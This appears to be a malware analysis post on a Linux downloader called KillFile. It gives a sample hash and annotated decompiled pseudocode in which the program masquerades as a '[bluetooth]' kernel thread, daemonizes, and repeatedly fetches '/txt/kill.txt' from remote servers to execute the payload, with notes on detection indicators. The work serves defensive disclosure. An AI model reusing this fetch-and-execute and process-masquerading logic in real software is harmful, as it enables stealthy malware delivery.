- Linux/KillFile (made in China)
- It downloads and executes Xor DDoS filelessly
- hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VT)
- Reverse engineering result:
- void main(int a1, char arg2) // Entry point: overwrites the process name, daemonizes, then calls killfileandpid() and RunFile() in an endless loop. arg2 is dereferenced as a string pointer below, so it is presumably argv with decompiler typing - confirm against the binary.
- {
- size_t var_length_procname; from EAX
- var_length_procname = strlen(*arg2); // length of the original process-name string
- memset(*arg2, 0, var_length_procname); // wipe the original name in place
- memcpy(*arg2, "[bluetooth]", 0xCu); // 0xC = 11 characters plus the NUL. The bracketed name imitates a kernel thread in process listings; a genuine kernel thread has an empty /proc/<pid>/cmdline, so a cmdline that literally reads "[bluetooth]" is a detection signal.
- daemon(1, 0); // nochdir=1 keeps the current directory, noclose=0 redirects stdin/stdout/stderr to /dev/null
- nice(-20); // asks for the highest scheduling priority; this only succeeds with privileges
- while ( 1 )
- {
- if ( kill_time > 4 ) // kill_time is defined outside this listing; with the sleep(1) below this branch fires roughly every five seconds
- {
- kill_time = 0;
- killfileandpid(); // forks the child that runs KillProcess()
- RunFile(); // body not included in this listing
- }
- ++kill_time;
- sleep(1);
- }
- }
- __pid_t killfileandpid() // Forks a child that runs KillProcess() in its own session while the parent waits for a child to exit. Returns the value of wait(0), or fork()'s negative result when the fork fails.
- {
- __pid_t result; from EAX
- result = fork();
- if ( result >= 0 ) // fork succeeded; both parent and child enter here
- {
- if ( !result ) // child branch
- {
- setsid(); // new session, detached from the parent's controlling terminal
- umask(0); // clear the file-mode creation mask
- KillProcess(); // marked __noreturn in this listing: the child ends in _exit(0) there
- }
- result = wait(0); // parent blocks until a child terminates and reaps it
- }
- return result;
- }
- void __noreturn KillProcess() // Child-side worker: requests "/txt/kill.txt" from up to four Remote_URL entries, strips one trailing newline from the result and hands it to GetProcess(); every path shown ends in _exit(0).
- {
- int v0; // typed int by the decompiler, but cleared with 0x2800 bytes and used as the sprintf target below, so it is really the URL buffer
- char s[10240]; // 10240 = 0x2800
- int i;
- memset(s, 0, 0x2800); // buffer for file
- memset(&v0, 0, 0x2800); // buffer for mem
- for ( i = 0; ; ++i ) // i indexes Remote_URL, which is defined outside this listing
- {
- if ( i > 3 ) // all four attempts (i = 0..3) failed
- _exit(0);
- sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt"); // builds "<Remote_URL[i]>/txt/kill.txt"; the request path "/txt/kill.txt" is usable as a network indicator
- if ( http_download(&v0, s, 0) ) // forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s
- break; // a non-zero return ends the retry loop
- }
- if ( s[strlen(s) - 1] == 10 ) // 10 is '\n'. s is read as a NUL-terminated string here, so the download appears to land in this buffer - confirm in http_download. An empty s would make the index strlen(s) - 1 wrap around.
- s[strlen(s) - 1] = 0; // drop the trailing newline
- GetProcess(s); // use proc/exec to execute downloaded file and delete the file after exec (analyst's description; GetProcess itself is not in this listing)
- _exit(0);
- }
- @unixfreaxjp #MalwareMustDie